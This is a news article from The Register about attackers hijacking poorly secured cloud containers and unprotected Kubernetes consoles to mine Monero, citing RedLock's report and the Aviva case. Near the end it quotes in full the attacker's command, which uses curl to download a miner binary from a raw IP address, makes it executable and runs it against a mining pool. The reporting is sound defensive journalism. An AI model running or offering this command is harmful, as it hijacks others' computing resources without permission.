Security

Crypto-coin miners caught toiling away in hacked cloud boxes

Manic miners don't even pwn you: They just use default creds admins are too lazy to change

By Richard Chirgwin

13 SHARE

Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.

However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such Coin Hive's spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone has automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u didi123123321@gmail.com -p x

Change those credentials, people. ®

Sign up to our NewsletterGet IT in your inbox daily

13 Comments

More from The Register

Oh FNZ, Aviva! System back up, still trudging through queries backlog

2-day email turnarounds as users wail over payment lags

Aviva dumps DXC, shoves data centre support at Atos

Exclusive UK insurance bods find new bit barn bouncer

Microsoft's latest Windows 10 update downs Chrome, Cortana

Redmond, Google and Intel are desperately hunting for a fix

Microsoft has another crack at fixing Chrome problems in Windows 10

SMB1 networking and Media Center content playback revived

Judge bins sueball lobbed at Malwarebytes by rival antivirus maker for torpedoing its tool

Litigious security biz upset at blanket PC ban

Chrome sends old Macs on permanent Safari: Browser bricks itself

Google puts Mavericks on a cargo plane outta Hong Kong

Malwarebytes eats upstart

Google plots death of inline installation for Chrome extensions

All install paths will be rerouted through the Chrome Web Store

Windows Store nixed Google Chrome 'app' hours after it went live

Installer merely redirected to the official source

Google Chrome: HTTPS or bust. Insecure HTTP D-Day is tomorrow, folks

On Tues, you lose... if you're not encrypted with a TLS cert (which are free, by the way)